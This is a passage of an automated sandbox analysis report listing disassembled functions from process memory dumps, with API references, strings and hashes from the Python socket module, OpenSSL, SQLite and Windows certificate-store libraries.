FreeAddrInfoW.WS2_32 ref: 00007FF8B7E56961
FreeAddrInfoW.WS2_32 ref: 00007FF8B7E569BF

Strings

OO|iiii:getaddrinfo, xrefs: 00007FF8B7E566A4
%ld, xrefs: 00007FF8B7E56784
getaddrinfo() argument 1 must be string or None, xrefs: 00007FF8B7E569CE
idna, xrefs: 00007FF8B7E5671B
iiisO, xrefs: 00007FF8B7E568E9
socket.getaddrinfo, xrefs: 00007FF8B7E56803
OOiii, xrefs: 00007FF8B7E567F2
Int or String expected, xrefs: 00007FF8B7E56992

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: AddrFreeInfo$getaddrinfo
String ID: %ld$Int or String expected$OOiii$OO|iiii:getaddrinfo$getaddrinfo() argument 1 must be string or None$idna$iiisO$socket.getaddrinfo
API String ID: 2288433384-3943835681
Opcode ID: 8ec852737167a13786df1e3d18dd689f5ae79de5e7674d4188698fc6a662bfef
Instruction ID: 9d488a00c8908519dc425b401446839b4d22a9cbe272e3d7c11042e99ff422b0
Opcode Fuzzy Hash: 8ec852737167a13786df1e3d18dd689f5ae79de5e7674d4188698fc6a662bfef
Instruction Fuzzy Hash: 40B1D3B6B18B8A8AEB50CB69E4515BC23B1AF48FD8B044535DE4E67A68DF3CF445C300

Function 00007FF8B7E546BC Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAGetLastError.WS2_32 ref: 00007FF8B7E54763
WSAGetLastError.WS2_32 ref: 00007FF8B7E5476B
WSAGetLastError.WS2_32 ref: 00007FF8B7E547D0
WSAGetLastError.WS2_32 ref: 00007FF8B7E547D8

Part of subcall function 00007FF8B7E53BA8: select.WS2_32 ref: 00007FF8B7E53C70

WSAGetLastError.WS2_32 ref: 00007FF8B7E547F8
WSAGetLastError.WS2_32 ref: 00007FF8B7E5480D

Strings

timed out, xrefs: 00007FF8B7E5483F

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: ErrorLast$select
String ID: timed out
API String ID: 1043644060-3163636755
Opcode ID: 9b587e6fefef49f4a190ddd4d8aaa406dedff62da5cbaec3ae030964e690f9dd
Instruction ID: 146a8cc1782f64061ccd5596661d224bb03c0e81175011e47ab7dc1af9024708
Opcode Fuzzy Hash: 9b587e6fefef49f4a190ddd4d8aaa406dedff62da5cbaec3ae030964e690f9dd
Instruction Fuzzy Hash: 2B4169E1E09BCA86FB655B29A84623D2690BF46FE4F044130DF4D56AB4DF3CF8858620

Function 00007FF8B7E561EC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

setsockopt.WS2_32 ref: 00007FF8B7E56246
setsockopt.WS2_32 ref: 00007FF8B7E56337

Strings

iiO!I:setsockopt, xrefs: 00007FF8B7E56270
iii:setsockopt, xrefs: 00007FF8B7E56215
socket option is larger than %i bytes, xrefs: 00007FF8B7E56301
iiy*:setsockopt, xrefs: 00007FF8B7E562D1

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: setsockopt
String ID: iiO!I:setsockopt$iii:setsockopt$iiy*:setsockopt$socket option is larger than %i bytes
API String ID: 3981526788-1608436615
Opcode ID: 02501267f43bcdad24a96284ff2875df11776b70c75b4fcfdc4710674496ea6e
Instruction ID: 4d5d11d27419f60415405e0248726678e0c62015a9ab5f914ef60da3432bdd41
Opcode Fuzzy Hash: 02501267f43bcdad24a96284ff2875df11776b70c75b4fcfdc4710674496ea6e
Instruction Fuzzy Hash: F241DBB5618B8AD5EB208F55E8406AD7361FF88F94F504231DB9E43A64DF3CE549C700

Function 00007FF8A92E7F00 Relevance: 9.7, APIs: 1, Strings: 4, Instructions: 927COMMON

Download Yara Rule

Strings

..\s\ssl\ssl_ciph.c, xrefs: 00007FF8A92E7FDC, 00007FF8A92E800A, 00007FF8A92E85C1, 00007FF8A92E8813, 00007FF8A92E883C, 00007FF8A92E885C, 00007FF8A92E89D9, 00007FF8A92E89F3, 00007FF8A92E8A1C, 00007FF8A92E8AD4, 00007FF8A92E8B41
ALL:!COMPLEMENTOFDEFAULT:!eNULL, xrefs: 00007FF8A92E898E
ssl_create_cipher_list, xrefs: 00007FF8A92E7FFE, 00007FF8A92E8850
DEFAULT, xrefs: 00007FF8A92E893C

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: 00007C6126570
String ID: ..\s\ssl\ssl_ciph.c$ALL:!COMPLEMENTOFDEFAULT:!eNULL$DEFAULT$ssl_create_cipher_list
API String ID: 800424832-3764566645
Opcode ID: 947104d63a21e440328ef0d344c3cd69064b2b7d42a54e3ce49041097fba2a28
Instruction ID: ede97b1290da83805f42ba72046d842f24dab86cabac8e9fe71d4739e7c2c434
Opcode Fuzzy Hash: 947104d63a21e440328ef0d344c3cd69064b2b7d42a54e3ce49041097fba2a28
Instruction Fuzzy Hash: 0E825C72A0EB85A1EA58CF49D4906B97BA0FB14BC4F188435DEAC8B758EF3DD941C740

Function 00007FF8A87DEF40 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 412
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00007FF8A87DF17A

Part of subcall function 00007FF8A87DE980: 00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87DE9EB
Part of subcall function 00007FF8A87DE980: 00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87DEA73

Strings

exclusive, xrefs: 00007FF8A87DF10A
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FF8A87DF256
winOpen, xrefs: 00007FF8A87DF3ED
psow, xrefs: 00007FF8A87DF4F1

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007$CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 4190464644-3829269058
Opcode ID: 9c40d1f821fbff4623cdfebb0691ed0570da433715cefbede5ef862f60455f99
Instruction ID: 6f56a526208960dfbc7f519eb604b4001c38a580a8b7081c27dd00913ab66717
Opcode Fuzzy Hash: 9c40d1f821fbff4623cdfebb0691ed0570da433715cefbede5ef862f60455f99
Instruction Fuzzy Hash: A4028221A4B742A6FB648F21A84477963A0FF94BD5F080235DD4E476A5EF3CE4858F28

Function 00007FF8B7E53A8C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 00007FF8B7E53ABD
WSAGetLastError.WS2_32 ref: 00007FF8B7E53AD6
WSAGetLastError.WS2_32 ref: 00007FF8B7E53AE2
WSASetLastError.WS2_32 ref: 00007FF8B7E53B2C

Part of subcall function 00007FF8B7E546BC: WSAGetLastError.WS2_32 ref: 00007FF8B7E54763
Part of subcall function 00007FF8B7E546BC: WSAGetLastError.WS2_32 ref: 00007FF8B7E5476B

Strings

3', xrefs: 00007FF8B7E53B10

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: ErrorLast$connect
String ID: 3'
API String ID: 375857812-280543908
Opcode ID: 894e3716da3b7a919c91d244c011083b291459dbfbc34c8c541c57ac2b362d5e
Instruction ID: 4a37b16abc19593074932f68f65916b4f53b90894b602510d03638efd14f1cfb
Opcode Fuzzy Hash: 894e3716da3b7a919c91d244c011083b291459dbfbc34c8c541c57ac2b362d5e
Instruction Fuzzy Hash: 4E3142B1B0CB8A86E7A45F69A44527E7791AF44FD8F040235EF4E82BB5DE3CF8408600

Function 00007FF8B7E1C0E0 Relevance: 7.6, APIs: 5, Instructions: 60encryptionCOMMON

Download Yara Rule

APIs

CertOpenStore.CRYPT32 ref: 00007FF8B7E1C10C
CertOpenStore.CRYPT32 ref: 00007FF8B7E1C13F
CertAddStoreToCollection.CRYPT32 ref: 00007FF8B7E1C15A
CertCloseStore.CRYPT32 ref: 00007FF8B7E1C16C
CertCloseStore.CRYPT32 ref: 00007FF8B7E1C187

Memory Dump Source

Source File: 00000001.00000002.2485371418.00007FF8B7E11000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B7E10000, based on PE: true

Associated: 00000001.00000002.2485330634.00007FF8B7E10000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E30000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E39000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485371418.00007FF8B7E3D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485534943.00007FF8B7E40000.00000080.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000001.00000002.2485575820.00007FF8B7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e10000_Resource.jbxd

Similarity

API ID: CertStore$CloseOpen$Collection
String ID:
API String ID: 1995843185-0
Opcode ID: a6953a39759504ddb479cbb9bcf681c3032d5a5eefed2acd9d650b86d475ad4a
Instruction ID: d2f7e093a4d7c21faef387256c4fab8803fc375e076eb756fa2c9176947b3260
Opcode Fuzzy Hash: a6953a39759504ddb479cbb9bcf681c3032d5a5eefed2acd9d650b86d475ad4a
Instruction Fuzzy Hash: 9F211D32B5875186E7A4CB1AA90566EA7A2FF84FC4F494034CF4D43BB4DF3CE5469600

Function 00007FF8B8AF6630 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 200COMMON

Download Yara Rule

APIs

00007FF8A89BC8C0.PYTHON311 ref: 00007FF8B8AF67D8
00007FF8A89BC8C0.PYTHON311 ref: 00007FF8B8AF67EC

Strings

sqlite3.connect, xrefs: 00007FF8B8AF6666
sqlite3.connect/handle, xrefs: 00007FF8B8AF683C

Memory Dump Source

Source File: 00000001.00000002.2485937186.00007FF8B8AF1000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B8AF0000, based on PE: true

Associated: 00000001.00000002.2485899265.00007FF8B8AF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B08000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2485937186.00007FF8B8B0E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486071627.00007FF8B8B10000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000001.00000002.2486115443.00007FF8B8B12000.00000004.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b8af0000_Resource.jbxd

Similarity

API ID: 00007
String ID: sqlite3.connect$sqlite3.connect/handle
API String ID: 3568877910-789065793
Opcode ID: 7e7ca8c6f3c515788a42e7ce7b9262f0ab8a81d65c1d0820877ef43f56852731
Instruction ID: 64c867e0fc7ef6b23371f1374ad0d050439b146f4c60af41618c61f4a97de616
Opcode Fuzzy Hash: 7e7ca8c6f3c515788a42e7ce7b9262f0ab8a81d65c1d0820877ef43f56852731
Instruction Fuzzy Hash: 60A14E32A0AB4286EBA08F2AE84526973A5FB49FD4F046135DF8E87754DF3CD056C709

Function 00007FF8A87E90D0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 176COMMON

Download Yara Rule

Strings

831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0, xrefs: 00007FF8A87E90F2, 00007FF8A87E924E
database corruption, xrefs: 00007FF8A87E910B, 00007FF8A87E9267
%s at line %d of [%.10s], xrefs: 00007FF8A87E9112, 00007FF8A87E926E

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
API String ID: 0-3764764234
Opcode ID: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
Instruction ID: 61e2f6cf4810f9b0dc5a2b3f11aae51f65c9920a41146e19735d60e3b88e1083
Opcode Fuzzy Hash: a575294e85077e3cd45ec191bb9800bea06e703a172f2da4913369db34031028
Instruction Fuzzy Hash: 47714E63A4A646A2FB649B15E44437AB3A1FB84BC4F184435CE4D477A5FF3CE881C328

Function 00007FF8A87DC960 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF8A87DCA20
00007FF8BFAB19C0.VCRUNTIME140 ref: 00007FF8A87DCAE4

Strings

winRead, xrefs: 00007FF8A87DCA78
delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FF8A87DCAB9

Memory Dump Source

Source File: 00000001.00000002.2482929598.00007FF8A87D1000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00007FF8A87D0000, based on PE: true

Associated: 00000001.00000002.2482888201.00007FF8A87D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8929000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A892B000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2482929598.00007FF8A8940000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483220649.00007FF8A8942000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000001.00000002.2483263786.00007FF8A8944000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a87d0000_Resource.jbxd

Similarity

API ID: 00007FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 3505667475-1843600136
Opcode ID: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
Instruction ID: 4049ffb79043673b1a8704ce23217f03b645b72b87e09e9ad410132f13bb9380
Opcode Fuzzy Hash: 741b0e31e271a6a920d8f7a77574a081f4792607e0774ba0d9e6d6aca4af2089
Instruction Fuzzy Hash: A9411432A4AA42A6E310DF25E4445B8B765FBD47C0F584136EA4D43794DF3CE842CF58

Function 00007FF8A92D14BF Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 243COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A932EDA1

Strings

..\s\ssl\statem\statem.c, xrefs: 00007FF8A932EE91, 00007FF8A932EF5B, 00007FF8A932F071, 00007FF8A932F0A3
state_machine, xrefs: 00007FF8A932EE8A, 00007FF8A932EF54, 00007FF8A932F065, 00007FF8A932F097

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\statem\statem.c$state_machine
API String ID: 1452528299-1722249466
Opcode ID: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
Instruction ID: d123407b77e0adf5bd8a256a9fc4e54f465dc355e93162094eb7ebf8c679b6a4
Opcode Fuzzy Hash: 236d5f13ad3ad80265c17443c4d34d4b4270ad271146e1380b34927adae8de7c
Instruction Fuzzy Hash: A6A18F32A0EAC2A5FBB49E2594417BD32B9EF61BC4F146431DA0DC6689CF7DE8818741

Function 00007FF8A92D14EC Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 206COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A9317EF5

Strings

..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FF8A9317E9D, 00007FF8A9317FE4, 00007FF8A9318018
ssl3_read_n, xrefs: 00007FF8A9317E91, 00007FF8A9317FD8, 00007FF8A931800C

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_read_n
API String ID: 1452528299-4226281315
Opcode ID: fc9a4683d5afafe68efa1a8744627e211dffef789f65c49c1f38ce80a962cb2e
Instruction ID: b788c8311bf5e94cf6bc29961f3b7605b0f0a5b93bd8906fb20a6767b7047b27
Opcode Fuzzy Hash: fc9a4683d5afafe68efa1a8744627e211dffef789f65c49c1f38ce80a962cb2e
Instruction Fuzzy Hash: 72919231A0EAC6A6FB509F25D4407B966B0EF44BC4F686131DE4D8BAA9EF78D8458310

Function 00007FF8A92D1280 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF8A9318AA0

Strings

..\s\ssl\record\rec_layer_s3.c, xrefs: 00007FF8A9318B50, 00007FF8A9318BAC
ssl3_write_pending, xrefs: 00007FF8A9318B44, 00007FF8A9318BA0

Memory Dump Source

Source File: 00000001.00000002.2484486391.00007FF8A92D1000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FF8A92D0000, based on PE: true

Associated: 00000001.00000002.2484439323.00007FF8A92D0000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9353000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9355000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A937D000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9388000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484486391.00007FF8A9393000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2484884597.00007FF8A9397000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000001.00000002.2485026823.00007FF8A9398000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8a92d0000_Resource.jbxd

Similarity

API ID: ErrorLast
String ID: ..\s\ssl\record\rec_layer_s3.c$ssl3_write_pending
API String ID: 1452528299-1219543453
Opcode ID: 8ff6d7c4a1065a002e41a899ab5f23d3f91aa12a6731b666a508fe08045d8b83
Instruction ID: 4e16e3182d1daac348f5748554057787528c1c37d9f1cf2c73a7ca8d9b2d619c
Opcode Fuzzy Hash: 8ff6d7c4a1065a002e41a899ab5f23d3f91aa12a6731b666a508fe08045d8b83
Instruction Fuzzy Hash: A7419F72A0EEC1A2EB509F15D4842A9B3B1FB44BC4F649131DB0D87AA5EFBDE4518304

Function 00007FF8B7E53CC4 Relevance: 3.0, APIs: 2, Instructions: 34networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FF8B7E53CFD
WSAGetLastError.WS2_32 ref: 00007FF8B7E53D1A

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: ErrorLastioctlsocket
String ID:
API String ID: 1021210092-0
Opcode ID: 512bd52ceaf9c0de34ffa74ee59c230cdbc7db2c8c488b05b8fb4fcd4203aa17
Instruction ID: 6fb7779135feb1773a830d00af50d893f31970c959c1c6e3f96ef061f30a00f7
Opcode Fuzzy Hash: 512bd52ceaf9c0de34ffa74ee59c230cdbc7db2c8c488b05b8fb4fcd4203aa17
Instruction Fuzzy Hash: 9C012CA5A18BCA82E7149B6AF84402E67B0EF88FD4B504131EA4E93B34CE3CF495C710

Function 00007FF8B7E54864 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

closesocket.WS2_32 ref: 00007FF8B7E54894
00007FF8C6113440.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8B7E548AE

Memory Dump Source

Source File: 00000001.00000002.2485660803.00007FF8B7E51000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B7E50000, based on PE: true

Associated: 00000001.00000002.2485616376.00007FF8B7E50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E60000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E62000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485660803.00007FF8B7E65000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485822707.00007FF8B7E66000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000001.00000002.2485861999.00007FF8B7E68000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7ff8b7e50000_Resource.jbxd

Similarity

API ID: 00007C6113440closesocket
String ID:
API String ID: 3342475779-0
